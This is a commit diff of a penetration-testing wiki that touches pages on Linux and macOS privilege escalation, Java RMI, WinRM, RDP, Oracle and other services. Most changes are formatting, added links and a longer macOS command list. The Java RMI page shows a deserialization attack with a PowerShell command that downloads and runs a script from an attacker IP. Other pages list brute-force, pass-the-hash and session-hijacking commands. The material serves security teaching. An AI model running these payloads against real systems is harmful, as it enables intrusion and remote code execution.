GitBook: [master] 26 pages and 20 assets modified

linux-unix/privilege-escalation/README.md

@@ -1437,6 +1437,7 @@ Files that ships in packages downloaded from distribution repository go into `/u
 #### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
 
 **LinEnum**: [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)\(-t option\)  
+**Enumy**: [https://github.com/luke-goddard/enumy](https://github.com/luke-goddard/enumy)  
 **Unix Privesc Check:** [http://pentestmonkey.net/tools/audit/unix-privesc-check](http://pentestmonkey.net/tools/audit/unix-privesc-check)  
 **Linux Priv Checker:** [www.securitysift.com/download/linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py)  
 **BeeRoot:** [https://github.com/AlessandroZ/BeRoot/tree/master/Linux](https://github.com/AlessandroZ/BeRoot/tree/master/Linux)  

macos/macos-security-and-privilege-escalation/README.md

@@ -304,7 +304,7 @@ An **ASEP** is a location on the system that could lead to the **execution** of
 * `/System/Library/LaunchAgents`: Per-user agents provided by Apple.
 * `/System/Library/LaunchDaemons`: System-wide daemons provided by Apple.
 
-When a user logs in the plists located in `/Users/$USER/Library/LaunchAgents` are started with the **logged users permissions**.
+When a user logs in the plists located in `/Users/$USER/Library/LaunchAgents` and `/Users/$USER/Library/LaunchDemons` are started with the **logged users permissions**.
 
 The **main difference between agents and daemons is that agents are loaded when the user logs in and the daemons are loaded at system startup** \(as there are services like ssh that needs to be executed before any user access the system\). Also agents may use GUI while daemons need to run in the background.
 
@@ -874,28 +874,95 @@ You can enable/disable these services in "System Preferences" --> Sharing
 * **Apple Remote Desktop** \(ARD\), or “Remote Management”
 * **AppleEvent**, known as “Remote Apple Event”
 
-## Specific MacOS Enumeration
+## Specific MacOS Commands
 
 ```bash
-smbutil statshares -a #View smb shares mounted to the hard drive
+#System info
+date
+cal
+uptime #show time from starting
+w #list users
+whoami #this user
+finger username #info about user
+uname -a #sysinfo
+cat /proc/cpuinfo #processor
+cat /proc/meminfo #memory
+free #check memory
+df #check disk
+
 launchctl list #List services
 atq #List "at" tasks for the user
-mdfind password #Show all the files that contains the word password
-mfind -name password #List all the files containing the word password in the name
 sysctl -a #List kernel configuration
 diskutil list #List connected hard drives
 nettop #Monitor network usage of processes in top style
 
-#networksetup - set or view network options: Proxies, FW options and more
+
+#Searches
+mdfind password #Show all the files that contains the word password
+mfind -name password #List all the files containing the word password in the name
+
+
+#Open any app
+open -a <Application Name> --hide #Open app hidden
+open some.doc -a TextEdit #Open a file in one application
+
+
+#Computer doesn't go to sleep
+caffeinate &
+
+
+#system_profiler
+system_profiler --help #This command without arguments take lot of memory and time.
+system_profiler -listDataTypes
+system_profiler SPSoftwareDataType SPNetworkDataType
+
+
+#Network
+arp -i en0 -l -a #Print the macOS device's ARP table
+lsof -i -P -n | grep LISTEN
+smbutil statshares -a #View smb shares mounted to the hard drive
+
+##networksetup - set or view network options: Proxies, FW options and more
 networksetup -listallnetworkservices #List network services
 networksetup -listallhardwareports #Hardware ports
 networksetup -getinfo Wi-Fi #Wi-Fi info
 networksetup -getautoproxyurl Wi-Fi #Get proxy URL for Wifi
 networksetup -getwebproxy Wi-Fi #Wifi Web proxy
 networksetup -getftpproxy Wi-Fi #Wifi ftp proxy
+
+
+#Brew
+brew list #List installed
+brew search <text> #Search package
+brew info <formula>
+brew install <formula>
+brew uninstall <formula>
+brew cleanup #Remove older versions of installed formulae.
+brew cleanup <formula> #Remove older versions of specified formula.
+
+
+#Make the machine talk
+say hello -v diego
+#spanish: diego, Jorge, Monica
+#mexican: Juan, Paulina
+#french: Thomas, Amelie
+
+############ High privileges actions
+sudo purge #purge RAM
+#Sharing preferences
+sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist (enable ssh)
+sudo launchctl unload /System/Library/LaunchDaemons/ssh.plist (disable ssh)
+#Start apache
+sudo apachectl (start|status|restart|stop)
+ ##Web folder: /Library/WebServer/Documents/
+#Remove DNS cache
+dscacheutil -flushcache
+sudo killall -HUP mDNSResponder
+
 ```
 
 ## References
 
 * [https://taomm.org/vol1/analysis.html](https://taomm.org/vol1/analysis.html)
+* [https://github.com/NicolasGrimonpont/Cheatsheet](https://github.com/NicolasGrimonpont/Cheatsheet)
 

macos/macos-security-and-privilege-escalation/inspecting-and-debugging-mac-os-apps.md

@@ -378,6 +378,12 @@ cat procs.txt
 
 Or use `netstat` or `lsof`
 
+### More Fuzzing MacOS Info
+
+* [https://github.com/bnagy/slides/blob/master/OSXScale.pdf](https://github.com/bnagy/slides/blob/master/OSXScale.pdf)
+* [https://github.com/bnagy/francis/tree/master/exploitaben](https://github.com/bnagy/francis/tree/master/exploitaben)
+* [https://github.com/ant4g0nist/crashwrangler](https://github.com/ant4g0nist/crashwrangler)
+
 ## References
 
 * [https://www.youtube.com/watch?v=T5xfL9tEg44](https://www.youtube.com/watch?v=T5xfL9tEg44)

macos/macos-security-and-privilege-escalation/macos-mdm.md

@@ -115,7 +115,7 @@ The response is a JSON dictionary with some important data like:
 * Signed using the **device identity certificate \(from APNS\)**
 * **Certificate chain** includes expired **Apple iPhone Device CA**
 
-![](../../.gitbook/assets/image%20%28567%29%20%281%29%20%281%29.png)
+![](../../.gitbook/assets/image%20%28567%29%20%281%29.png)
 
 ### Step 6: Profile Installation
 

pentesting-web/saml-attacks/README.md

@@ -6,7 +6,7 @@
 
 ## Attacks Graphic
 
-![](../../.gitbook/assets/image%20%28535%29%20%281%29%20%281%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
+![](../../.gitbook/assets/image%20%28535%29%20%281%29%20%281%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
 
 ## Tool
 

pentesting/1099-pentesting-java-rmi.md

@@ -49,7 +49,7 @@ public class RmiServer extends UnicastRemoteObject implements RmiServerIntf {
             //do nothing, error means registry already exists
             System.out.println("java RMI registry already exists.");
         }
-           
+
         //Instantiate RmiServer
         RmiServer server = new RmiServer();
 
@@ -96,11 +96,16 @@ RMI methods are usually interesting as a bunch of them will **deserialize the re
 To execute remote methods, Java RMI clients submit a 64-bit hash of the method signature, which the server uses to identify the corresponding server-side method. These **hashes are computed** with the following logic:
 
 1. **Source code** representation of the signature:  
-`void myRemoteMethod(int count, Object obj, boolean flag)`  
+
+   `void myRemoteMethod(int count, Object obj, boolean flag)`  
+
 2. **Bytecode** representation of signature:  
-`myRemoteMethod(ILjava/lang/Object;Z)V`  
+
+   `myRemoteMethod(ILjava/lang/Object;Z)V`  
+
 3. Method Hash: **big-endian representation of first 8 bytes of the SHA1 of the signature**:  
-`Hash = SHA1String(“myRemoteMethod(ILjava/lang/Object;Z)V”).substring(0,8).reverse()`
+
+   `Hash = SHA1String(“myRemoteMethod(ILjava/lang/Object;Z)V”).substring(0,8).reverse()`
 
 As shown above, the information that is used to compute a method hash are: **the method name, the return types, and an ordered list of the fully qualified names of the parameters’ types**. Instead of brute-forcing the 64-bit keyspace, we can use wordlists for each of these categories to guess common signatures. Using [GitGot](https://labs.bishopfox.com/blog/gitgot-tool-release), I scraped GitHub for RMI interfaces in open source projects and found interesting patterns across the 15,000+ method signatures:
 
@@ -170,7 +175,6 @@ public String sayTest19(int paramInt) throws RemoteException;
 public String sayTest19(List paramList1, List paramList2) throws RemoteException;
 public String sayTest19(List[] paramArrayOfList, int paramInt) throws RemoteException;
 public Object sayTest20(String paramString) throws RemoteException;
-
 ```
 
 First let’s look at the **`add(int,int)`** method. Since its **method name is unique**, the **generated stub** is simply the **method** **name**. The server compares the client’s requested method \(`paramString` in the figure below\) against a string literal.
@@ -218,7 +222,6 @@ if (paramString.equals("sayTest19__org_omg_boxedRMI_java_util_seq1_List__long"))
  ((org.omg.CORBA_2_3.portable.OutputStream)localObject9).write_value((Serializable)localObject7, String.class);
  return (org.omg.CORBA.portable.OutputStream)localObject9;
 }
-
 ```
 
 And for **`sayTest20(String)`**, we again have a **unique method nam**e, but here we are **deserializing** a **`String`** class. In this case, the complex parameter allows us to **force a `ClassCastException` to allow identification without invocation**.
@@ -268,7 +271,7 @@ We can still achieve arbitrary Java deserialization by replacing object or array
 
 ## HackTricks Automatic Commands
 
-```
+```text
 Protocol_Name: Java-RMI    #Protocol Abbreviation if there is one.
 Port_Number:  1098     #Comma separated if there is more than one.
 Protocol_Description: Java Remote Method Inclusion         #Protocol Abbreviation Spelled out
@@ -282,14 +285,14 @@ nmap -sC -sV -Pn 10.11.1.73 -p 1100
     may dump the reg of the java-rmi instance. If this is the case the machine may be vulnerable to a deserializaion exploit.
     BaRMIe.jar is the way to go to directly exploit this vulnerability.
     https://github.com/NickstaDB/BaRMIe/releases/tag/v1.01      is where the latest build is hosted, pre-built
-    
+
 useage
     java -jar BaRMIe_v1.01.jar -attack 10.11.1.73 1100
     target select)          1
     available attacks)    1 (illegal bind deserialization)
     payloads)                1 (Apache Common Collections 3.1 worked for me, others may also work)
     OS Command)         powershell.exe -command "IEX(new-object net.webclient).downloadstring('http://192.168.119.167:80/3232.ps1')"
-    
+
     enjoy your system shell!
 
 https://book.hacktricks.xyz/pentesting/1099-pentesting-java-rmi
@@ -303,3 +306,4 @@ Name: Nmap register
 Description: Dump register of java-rmi instance
 Command: """nmap -sC -sV -Pn {IP} -p 1100"""
 ```
+

pentesting/113-pentesting-ident.md

@@ -70,7 +70,7 @@ identd.conf
 
 ## HackTricks Automatic Commands
 
-```
+```text
 Protocol_Name: Ident    #Protocol Abbreviation if there is one.
 Port_Number:  113     #Comma separated if there is more than one.
 Protocol_Description: Identification Protocol         #Protocol Abbreviation Spelled out
@@ -89,3 +89,4 @@ Note: """
 apt install ident-user-enum    ident-user-enum {IP} 22 23 139 445 (try all open ports)
 """
 ```
+

pentesting/1521-1522-1529-pentesting-oracle-listener/README.md

@@ -19,7 +19,7 @@ When enumerating Oracle the first step is to talk to the TNS-Listener that usual
 4. **Bruteforce credentials** for valid SID name discovered
 5. Try to **execute code** 
 
-In order to user MSF oracle modules you need to install some dependencies: ****[**Installation**](oracle-pentesting-requirements-installation.md)\*\*\*\*
+In order to user MSF oracle modules you need to install some dependencies: **\*\*\[**Installation_\*\]\(oracle-pentesting-requirements-installation.md\)\_\*\*\*
 
 ## Enumeration
 
@@ -103,7 +103,7 @@ pip3 install cx_Oracle --upgrade
 
 **Got SID?** Excellent, now let’s move to the next task and extract the user account information. From this point, you can connect to the listener and brute-force credentials.
 
-**Metasploit** _****scanner/oracle/oracle\_login_ It has a built-in dictionary for the **most popular default values of user account** information presented as login:password. By the way, such default entries represent one of the most popular and serious security problems in Oracle.
+**Metasploit** _\*\*scanner/oracle/oracle\_login_ It has a built-in dictionary for the **most popular default values of user account** information presented as login:password. By the way, such default entries represent one of the most popular and serious security problems in Oracle.
 
 **Nmap** can also help here with the script _oracle-brute_. Note that this script **mixes the logins and passwords**, that is, it tries each login against every password, and it takes quite a while!
 
@@ -120,14 +120,14 @@ Below are some of the default passwords associated with Oracle:
 
 Other **default passwords** can be found [here ](http://www.petefinnigan.com/default/oracle_default_passwords.htm)and [here](https://cirt.net/passwords?vendor=Oracle).
 
-The versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable to **offline brute force**. ****[**Read more about this technique here.**](remote-stealth-pass-brute-force.md)\*\*\*\*
+The versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable to **offline brute force**. **\*\*\[**Read more about this technique here._\*\]\(remote-stealth-pass-brute-force.md\)\_\*\*\*
 
 ### User/Pass bruteforce
 
 Different tools offered **different user/pass lists** for oracle:
 
 * **oscan:** _/usr/share/oscanner/accounts.default_ \(169 lines\)
-* **MSF-1:**  _from_ admin/oracle/oracle\_login  __/usr/share/metasploit-framework/data/wordlists/oracle\_default\_passwords.csv \(598 lines\)
+* **MSF-1:**  _from_ admin/oracle/oracle\_login  \_\_/usr/share/metasploit-framework/data/wordlists/oracle\_default\_passwords.csv \(598 lines\)
 * **MSF-2:** _from scanner/oracle/oracle\_login_  _/usr/share/metasploit-framework/data/wordlists/oracle\_default\_userpass.txt_ \(568 lines\)
 * **Nmap:** _/usr/share/nmap/nselib/data/oracle-default-accounts.lst_ \(687 lines\)
 
@@ -139,7 +139,7 @@ I have **mixed** all of them and **removed duplicates:**
 
 ### [Brute Force](../../brute-force.md#oraclesql)
 
-Now, that you **know a valid SID and valid credentials**. To connect to the database you need the tool: _**sqlplus**_ and to install it you need to follow some steps: 
+Now, that you **know a valid SID and valid credentials**. To connect to the database you need the tool: _**sqlplus**_ and to install it you need to follow some steps:
 
 [Installation](oracle-pentesting-requirements-installation.md)
 
@@ -257,7 +257,7 @@ msf> use auxiliary/sqli/oracle/lt_findricset_cursor
 
 If you want to practice attacking Oracle databases, the safest way is to register for the Oracle Developer Days Virtualbox VM:
 
-{% embed url="http://www.oracle.com/technetwork/database/enterprise-edition/databaseappdev-vm-161299.html" %}
+{% embed url="http://www.oracle.com/technetwork/database/enterprise-edition/databaseappdev-vm-161299.html" caption="" %}
 
 Most part of the information in this post was extracted from: [https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573](https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573) and from [https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/](https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/)
 
@@ -267,7 +267,7 @@ Other interesting **references**:
 
 ## HackTricks Automatic Commands
 
-```
+```text
 Protocol_Name: Oracle    #Protocol Abbreviation if there is one.
 Port_Number:  1521     #Comma separated if there is more than one.
 Protocol_Description: Oracle TNS Listener         #Protocol Abbreviation Spelled out
@@ -293,3 +293,4 @@ Name: Nmap
 Description: Nmap with Oracle Scripts
 Command: """nmap --script "oracle-tns-version" -p 1521 -T4 -sV {IP}"""
 ```
+

pentesting/43-pentesting-whois.md

@@ -2,7 +2,7 @@
 
 ## Basic Information
 
- **WHOIS** \(pronounced as the phrase "who is"\) is a query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block or an autonomous system, but is also used for a wider range of other information. \(From [here](https://en.wikipedia.org/wiki/WHOIS)\)
+**WHOIS** \(pronounced as the phrase "who is"\) is a query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block or an autonomous system, but is also used for a wider range of other information. \(From [here](https://en.wikipedia.org/wiki/WHOIS)\)
 
 **Default port:** 43
 
@@ -32,7 +32,7 @@ Also, the WHOIS service always needs to use a **database** to store and extract
 
 ## HackTricks Automatic Commands
 
-```
+```text
 Protocol_Name: WHOIS    #Protocol Abbreviation if there is one.
 Port_Number:  43     #Comma separated if there is more than one.
 Protocol_Description: WHOIS         #Protocol Abbreviation Spelled out
@@ -49,3 +49,4 @@ Name: Banner Grab
 Description: Grab WHOIS Banner
 Command: """whois -h {IP} -p 43 {Domain_Name} && echo {Domain_Name} | nc -vn {IP} 43"""
 ```
+

pentesting/5985-5986-pentesting-winrm.md

@@ -1,9 +1,8 @@
 # 5985,5986 - Pentesting WinRM
 
----
-description: >-
-  https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/
----
+description: >-
+
+## [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/)
 
 ## WinRM
 
@@ -24,12 +23,12 @@ We first have to configure our attack machine to work with WinRM as well. We nee
 
 ```text
 Enable-PSRemoting -Force  
-Set-Item wsman:\localhost\client\trustedhosts *  
+Set-Item wsman:\localhost\client\trustedhosts *
 ```
 
 This adds a wildcard to the trustedhosts setting. Be wary of what that entails. _Note: I also had to change the network type on my attack machine from "Public" to "Work" network._
 
-You can also **activate** WinRM **remotely** _****_using _wmic_:
+You can also **activate** WinRM **remotely** _\*\*\_using \_wmic_:
 
 ```text
 wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
@@ -58,7 +57,7 @@ Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /al
 You can also **execute a command of your current PS console via** _**Invoke-Command**_. Suppose that you have locally a function called _**enumeration**_ and you want to **execute it in a remote computer**, you can do:
 
 ```ruby
-Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"] 
+Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]
 ```
 
 ### Execute a Script
@@ -83,14 +82,14 @@ Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Creden
 
 ![](../.gitbook/assets/image%20%2892%29.png)
 
-**The session will run in a new process \(wsmprovhost\) inside the "victim"** 
+**The session will run in a new process \(wsmprovhost\) inside the "victim"**
 
-###  **Forcing WinRM Open**
+### **Forcing WinRM Open**
 
 If you really want to use PS Remoting and WinRM but the target isn't configured for it, you could "force" it on through a single command. I wouldn't recommend this but if you really wanted to use WinRM or PSRemoting than by all means do it this way. For example, using PSExec:
 
 ```text
-PS C:\tools\SysinternalsSuite> .\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"  
+PS C:\tools\SysinternalsSuite> .\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"
 ```
 
 Now we can enter a remote PS session on the victim.
@@ -236,7 +235,7 @@ end
 
 ## HackTricks Automatic Commands
 
-```
+```text
 Protocol_Name: WinRM    #Protocol Abbreviation if there is one.
 Port_Number:  5985     #Comma separated if there is more than one.
 Protocol_Description: Windows Remote Managment        #Protocol Abbreviation Spelled out
@@ -268,3 +267,4 @@ print(s.run_ps('ipconfig'))
 https://book.hacktricks.xyz/pentesting/pentesting-winrm
 """
 ```
+

pentesting/nfs-service-pentesting.md

@@ -72,7 +72,7 @@ To easily list, mount and change UID and GID to have access to files you can use
 
 ## HackTricks Automatic Commands
 
-```
+```text
 Protocol_Name: NFS    #Protocol Abbreviation if there is one.
 Port_Number:  2049     #Comma separated if there is more than one.
 Protocol_Description: Network File System         #Protocol Abbreviation Spelled out
@@ -85,7 +85,7 @@ It is a client/server system that allows users to access files across a network
 #apt install nfs-common
 showmount 10.10.10.180      ~or~showmount -e 10.10.10.180
     should show you available shares (example /home)
-    
+
 mount -t nfs -o ver=2 10.10.10.180:/home /mnt/
 cd /mnt
 nano into /etc/passwd and change the uid (probably 1000 or 1001) to match the owner of the files if you are not able to get in
@@ -97,3 +97,4 @@ Name: Nmap
 Description: Nmap with NFS Scripts
 Command: """nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-status.nse -p 2049 {IP}"""
 ```
+

pentesting/pentesting-dns.md

@@ -194,7 +194,7 @@ named.conf
 
 ## HackTricks Automatic Commands
 
-```
+```text
 Protocol_Name: DNS    #Protocol Abbreviation if there is one.
 Port_Number:  53     #Comma separated if there is more than one.
 Protocol_Description: Domain Name Service        #Protocol Abbreviation Spelled out
@@ -210,11 +210,11 @@ dnsrecon -r {Network}{CIDR} -n {IP} -d {Domain_Name}
 dig axfr @{IP}
 dig axfr {Domain_Name} @{IP}
 nslookup
-	SERVER {IP}
-	127.0.0.1
-	{IP}
-	Domain_Name
-	exit
+    SERVER {IP}
+    127.0.0.1
+    {IP}
+    Domain_Name
+    exit
 
 https://book.hacktricks.xyz/pentesting/pentesting-dns
 """
@@ -235,3 +235,4 @@ Name: Active Directory
 Description: Eunuerate a DC via DNS
 Command: dig -t _gc._{Domain_Name} && dig -t _ldap._{Domain_Name} && dig -t _kerberos._{Domain_Name} && dig -t _kpasswd._{Domain_Name} && nmap --script dns-srv-enum --script-args "dns-srv-enum.domain={Domain_Name}"
 ```
+

pentesting/pentesting-ftp/README.md

@@ -186,7 +186,7 @@ proftpd.conf
 
 ## HackTricks Automatic Commands
 
-```
+```text
 Protocol_Name: FTP    #Protocol Abbreviation if there is one.
 Port_Number:  21     #Comma separated if there is more than one.
 Protocol_Description: File Transfer Protocol          #Protocol Abbreviation Spelled out
@@ -224,3 +224,4 @@ Note: """
 ftp://anonymous:anonymous@{IP}
 """
 ```
+

pentesting/pentesting-imap.md

@@ -97,8 +97,6 @@ apt install evolution
 
 ![](../.gitbook/assets/image%20%28477%29.png)
 
-
-
 ### CURL
 
 Basic navigation is possible with [CURL](https://ec.haxx.se/usingcurl/usingcurl-reademail#imap), but the documentation is light on details so checking the [source](https://github.com/curl/curl/blob/master/lib/imap.c) is recommended for precise details.
@@ -162,7 +160,7 @@ done
 
 ## HackTricks Automatic Commands
 
-```
+```text
 Protocol_Name: IMAP    #Protocol Abbreviation if there is one.
 Port_Number:  143,993     #Comma separated if there is more than one.
 Protocol_Description: Internet Message Access Protocol         #Protocol Abbreviation Spelled out
@@ -183,3 +181,4 @@ Name: Secure Banner Grab
 Description: Banner Grab 993
 Command: """openssl s_client -connect {IP}:993 -quiet"""
 ```
+

pentesting/pentesting-kerberos-88/README.md

@@ -24,13 +24,13 @@ PORT   STATE SERVICE
 
 Simply stated, the vulnerability enables an attacker to modify an existing, valid, domain user logon token \(Kerberos Ticket Granting Ticket, TGT, ticket\) by adding the false statement that the user is a member of Domain Admins \(or other sensitive group\) and the Domain Controller \(DC\) will validate that \(false\) claim enabling attacker improper access to any domain \(in the AD forest\) resource on the network.
 
-{% embed url="https://adsecurity.org/?p=541" %}
+{% embed url="https://adsecurity.org/?p=541" caption="" %}
 
 Other exploits: [https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek)
 
 ## HackTricks Automatic Commands
 
-```
+```text
 Protocol_Name: Kerberos    #Protocol Abbreviation if there is one.
 Port_Number:  88   #Comma separated if there is more than one.
 Protocol_Description: AD Domain Authentication         #Protocol Abbreviation Spelled out
@@ -61,3 +61,4 @@ Note: """
 https://rootsecdev.medium.com/installing-impacket-on-kali-linux-2020-1d9ad69d10bb        GetUserSPNs.py -request -dc-ip {IP} active.htb/svc_tgs
 """
 ```
+

pentesting/pentesting-ldap.md

@@ -342,7 +342,7 @@ You can feed john with the password hash \(from '{SSHA}' to 'structural' without
 
 ## HackTricks Automatic Commands
 
-```
+```text
 Protocol_Name: LDAP    #Protocol Abbreviation if there is one.
 Port_Number:  389,636     #Comma separated if there is more than one.
 Protocol_Description: Lightweight Directory Access Protocol         #Protocol Abbreviation Spelled out
@@ -371,3 +371,4 @@ Name: LdapSearch Big Dump
 Description: Need Naming Context to do big dump
 Command: ldapsearch -h {IP} -x -b "{Naming_Context}"
 ```
+

pentesting/pentesting-mssql-microsoft-sql-server.md

@@ -221,7 +221,7 @@ You probably will be able to escalate to Administrator using this token: [Juicy-
 
 ## HackTricks Automatic Commands
 
-```
+```text
 Protocol_Name: MSSQL    #Protocol Abbreviation if there is one.
 Port_Number:  1433     #Comma separated if there is more than one.
 Protocol_Description: Microsoft SQL Server         #Protocol Abbreviation Spelled out
@@ -268,3 +268,4 @@ Name: Nmap for SQL
 Description: Nmap with SQL Scripts
 Command: """nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP}"""
 ```
+

pentesting/pentesting-mysql.md

@@ -3,7 +3,7 @@
 ## **Basic Information**
 
 **MySQL** is a freely available open source Relational Database Management System \(RDBMS\) that uses Structured Query Language \(**SQL**\).  
-_\*\*_From [here](https://www.siteground.com/tutorials/php-mysql/mysql/).
+\_\*\*\_From [here](https://www.siteground.com/tutorials/php-mysql/mysql/).
 
 **Default port:** 3306
 
@@ -546,7 +546,7 @@ x$waits\_global\_by\_latency
 
 ## HackTricks Automatic Commands
 
-```
+```text
 Protocol_Name: MySql    #Protocol Abbreviation if there is one.
 Port_Number:  3306     #Comma separated if there is more than one.
 Protocol_Description: MySql     #Protocol Abbreviation Spelled out
@@ -567,3 +567,4 @@ Name: MySql
 Description: Attempt to connect to mysql server
 Command: """mysql -h {IP} -u {Username}@localhost"""
 ```
+

pentesting/pentesting-ntp.md

@@ -2,7 +2,7 @@
 
 ## Basic Information
 
- The Network Time Protocol \(**NTP**\) is a networking protocol for clock synchronization between computer systems over packet-switched, variable-latency data networks.
+The Network Time Protocol \(**NTP**\) is a networking protocol for clock synchronization between computer systems over packet-switched, variable-latency data networks.
 
 **Default port:** 123/udp
 
@@ -49,7 +49,7 @@ ntpdc -n -c monlist <IP>
 
 ## HackTricks Automatic Commands
 
-```
+```text
 Protocol_Name: NTP    #Protocol Abbreviation if there is one.
 Port_Number:  123     #Comma separated if there is more than one.
 Protocol_Description: Network Time Protocol         #Protocol Abbreviation Spelled out
@@ -66,3 +66,4 @@ Name: Nmap
 Description: Enumerate NTP
 Command: """nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 {IP}"""
 ```
+

pentesting/pentesting-pop.md

@@ -83,7 +83,7 @@ root@kali:~# telnet $ip 110
 
 ## HackTricks Automatic Commands
 
-```
+```text
 Protocol_Name:  POP   #Protocol Abbreviation if there is one.
 Port_Number:  110     #Comma separated if there is more than one.
 Protocol_Description: Post Office Protocol         #Protocol Abbreviation Spelled out
@@ -109,3 +109,4 @@ Name: Nmap
 Description: Scan for POP info
 Command: nmap --scripts "pop3-capabilities or pop3-ntlm-info" -sV -port 110 {IP}
 ```
+

pentesting/pentesting-rdp.md

@@ -20,7 +20,7 @@ xfreerdp /u:[domain\]<username> /p:<password> /v:<IP>
 xfreerdp /u:[domain\]<username> /pth:<hash> /v:<IP>
 ```
 
-### [Brute force](../brute-force.md#rdp) 
+### [Brute force](../brute-force.md#rdp)
 
 **Be careful, you could lock accounts**
 
@@ -42,7 +42,7 @@ It checks the available encryption and DoS vulnerability \(without causing DoS t
 
 ## Post-Exploitation
 
-{% embed url="https://github.com/JoelGMSec/AutoRDPwn" %}
+{% embed url="https://github.com/JoelGMSec/AutoRDPwn" caption="" %}
 
 ### Launch CMD with other cretentials so they are used in the network
 
@@ -68,7 +68,7 @@ query user
 tscon <ID> /dest:<SESSIONNAME>
 ```
 
-Now you will be inside the selected RDP session and you will have impersonate a user using only Windows tools and features. 
+Now you will be inside the selected RDP session and you will have impersonate a user using only Windows tools and features.
 
 **Important**: When you access an active RDP sessions you will kickoff the user that was using it.
 
@@ -97,7 +97,7 @@ net localgroup "Remote Desktop Users" UserLoginName /add
 
 ## HackTricks Automatic Commands
 
-```
+```text
 Protocol_Name: RDP    #Protocol Abbreviation if there is one.
 Port_Number:  3389     #Comma separated if there is more than one.
 Protocol_Description: Remote Desktop Protocol         #Protocol Abbreviation Spelled out
@@ -114,3 +114,4 @@ Name: Nmap
 Description: Nmap with RDP Scripts
 Command: """nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}"""
 ```
+

pentesting/pentesting-rpcbind.md

@@ -18,7 +18,7 @@ rpcinfo irked.htb
 nmap -sSUC -p111 192.168.10.1
 ```
 
-Sometimes it doesn't give you any information, in other occasions you will get something like this:  
+Sometimes it doesn't give you any information, in other occasions you will get something like this:
 
 ![](../.gitbook/assets/image%20%2863%29.png)
 
@@ -42,7 +42,6 @@ If you find the service `ypbind`running:
 
 You can try to exploit it. Anyway, first of all you will **need to guess the NIS "domain name"** of the machine \(when NIS is installed it's configured a "domain name"\) and **without knowing this domain name you cannot do anything**.
 
-
 Upon obtaining the NIS domain name for the environment \(example.org in this case\), use the ypwhich command to ping the NIS server and ypcat to obtain sensitive material. You should feed encrypted password hashes into John the Ripper, and once cracked, you can use it to evaluate system access and privileges.
 
 ```bash
@@ -85,7 +84,7 @@ More information in [https://medium.com/@sebnemK/how-to-bypass-filtered-portmapp
 
 ## HackTricks Automatic Commands
 
-```
+```text
 Protocol_Name: Portmapper    #Protocol Abbreviation if there is one.
 Port_Number:  43     #Comma separated if there is more than one.
 Protocol_Description: PM or RPCBind        #Protocol Abbreviation Spelled out
@@ -106,3 +105,4 @@ Name: nmap
 Description: May give netstat-type info
 Command: """nmap -sSUC -p 111 {IP}"""
 ```
+

pentesting/pentesting-smb.md

@@ -446,7 +446,7 @@ Which are used by some browsers and tools \(like Skype\)
 
 ## HackTricks Automatic Commands
 
-```
+```text
 Protocol_Name: SMB    #Protocol Abbreviation if there is one.
 Port_Number:  137,138,139     #Comma separated if there is more than one.
 Protocol_Description: Server Message Block         #Protocol Abbreviation Spelled out
@@ -497,3 +497,4 @@ Name: Nmap Smb Scan 2
 Description: SMB Vuln Scan With Nmap (Less Specific)
 Command: """nmap --script smb-vuln* -Pn -p 139,445 {IP}"""
 ```
+

pentesting/pentesting-smtp/README.md

@@ -441,7 +441,7 @@ submit.cf
 
 ## HackTricks Automatic Commands
 
-```
+```text
 Protocol_Name: SMTP    #Protocol Abbreviation if there is one.
 Port_Number:  25,465,587     #Comma separated if there is more than one.
 Protocol_Description: Simple Mail Transfer Protocol          #Protocol Abbreviation Spelled out
@@ -474,3 +474,4 @@ Name: Find MX Servers:
 Description: Find MX servers of an organization
 Command: """dig +short mx {Domain_Name}"""
 ```
+

pentesting/pentesting-snmp/README.md

@@ -183,7 +183,7 @@ If there is an ACL that only allows some IPs to query the SMNP service, you can
 
 ## HackTricks Automatic Commands
 
-```
+```text
 Protocol_Name: SNMP    #Protocol Abbreviation if there is one.
 Port_Number:  161     #Comma separated if there is more than one.
 Protocol_Description: Simple Network Managment Protocol         #Protocol Abbreviation Spelled out
@@ -208,3 +208,4 @@ Name: Nmap
